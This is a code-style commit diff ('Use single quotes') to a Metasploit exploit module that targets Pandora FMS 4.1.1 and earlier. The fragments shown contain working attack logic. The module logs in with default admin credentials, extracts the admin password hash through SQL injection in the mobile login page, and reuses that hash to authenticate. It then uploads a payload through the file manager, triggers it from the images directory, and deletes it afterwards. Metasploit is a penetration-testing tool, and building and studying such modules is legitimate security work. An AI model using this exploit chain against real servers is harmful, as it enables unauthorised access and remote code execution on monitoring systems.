Use single quotes
jvazquez-r7
parent
674ceeed40
commit
2c207597dc
|
|
@ -50,8 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
|
||||
OptString.new('USER', [false, "The username to authenticate with", "admin"]),
|
||||
OptString.new('PASS', [false, "The password to authenticate with", "pandora"]),
|
||||
OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
|
||||
OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, "index.php")
|
||||
'uri' => normalize_uri(uri, 'index.php')
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/
|
||||
|
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if version && version <= "4.1.1"
|
||||
if version && version <= '4.1.1'
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
@ -90,14 +90,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Attempt to login with default credentials (admin:pandora)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'login' => "1",
|
||||
},
|
||||
'vars_post' => {
|
||||
'nick' => datastore['USER'],
|
||||
'pass' => datastore['PASS'],
|
||||
'Login' => "Login",
|
||||
'Login' => 'Login',
|
||||
}
|
||||
})
|
||||
|
||||
|
|
@ -128,13 +128,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Attempt to login using login hash password
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'loginhash' => "auto",
|
||||
'loginhash' => 'auto',
|
||||
},
|
||||
'vars_post' => {
|
||||
'loginhash_data' => Rex::Text.md5("admin#{password}"),
|
||||
'loginhash_user' => "admin",
|
||||
'loginhash_user' => 'admin',
|
||||
}
|
||||
})
|
||||
|
||||
|
|
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Successfully authenticated!")
|
||||
print_status("#{peer} - Attempting to retrieve session cookie")
|
||||
@cookie = res.get_cookies
|
||||
if @cookie.include?("PHPSESSID")
|
||||
if @cookie.include?('PHPSESSID')
|
||||
print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
|
||||
return true
|
||||
else
|
||||
|
|
@ -187,9 +187,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Extract password hash from database
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, "mobile", "index.php"),
|
||||
'uri' => normalize_uri(uri, 'mobile', 'index.php'),
|
||||
'vars_post' => {
|
||||
'action' => "login",
|
||||
'action' => 'login',
|
||||
'user' => sql,
|
||||
'password' => 'pass',
|
||||
'input' => 'Login'
|
||||
|
|
@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
|
|
@ -289,7 +289,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Trigger Payload
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, "images", @payload_name),
|
||||
'uri' => normalize_uri(uri, 'images', @payload_name),
|
||||
'cookie' => @cookie
|
||||
}, 1)
|
||||
end
|
||||
|
|
@ -322,7 +322,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
|
|
@ -355,7 +355,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
filepath = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract real_directory from response! Falling back to default.")
|
||||
filepath = "/var/www/html/pandora_console/images/"
|
||||
filepath = '/var/www/html/pandora_console/images/'
|
||||
end
|
||||
|
||||
|
||||
|
|
@ -380,7 +380,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("Success")
|
||||
if res && res.code == 200 && res.body.include?('Success')
|
||||
print_status("#{peer} - Script removed successfully")
|
||||
else
|
||||
print_warning("#{peer} - Failed to remove #{@payload_name}")
|
||||
|
|
|
|||
Loading…
Reference in New Issue